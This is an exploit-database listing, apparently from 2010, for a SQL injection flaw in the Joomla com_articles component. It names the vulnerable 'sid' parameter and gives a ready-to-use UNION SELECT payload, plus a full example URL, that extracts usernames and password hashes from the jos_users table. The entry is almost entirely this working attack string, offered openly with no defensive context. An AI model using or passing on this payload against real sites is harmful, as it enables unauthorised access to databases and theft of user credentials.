Joomla! Component com_articles - SQL Injection



EKU-ID: 19332 CVE: OSVDB-ID:
Author: pratul agrawal Published: 2010-04-08 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home 



                                          ****************************************************************************

                                                     Joomla Component com_articles SQL Injection Vulnerability

                                          ****************************************************************************


# Vulnerability  :       Joomla Component com_articles SQL Injection Vulnerability

# email          :       Pratulag@yahoo.com

# Author         :       Pratul Agrawal








************************************************   ExploiT   *******************************************************

 [*] Vulnerable File :

        http://127.0.0.1/index.php?option=com_articles&task=view_addarticles&sid=[SQL]

 [*] ExploiT         :

       9999+union+select+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10+from+jos_users—

 [*] Example         :

    http://127.0.0.1/index.php?option=com_articles&task=view_addarticles&sid=9999+union+select+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10+from+jos_users—


********************************************************************************************************************



  # If you have any questions, comments, or concerns, feel free to contact me.



 Quote of the day -  "I'm an excellent housekeeper. Every time I get a divorce, I keep the house." hE He he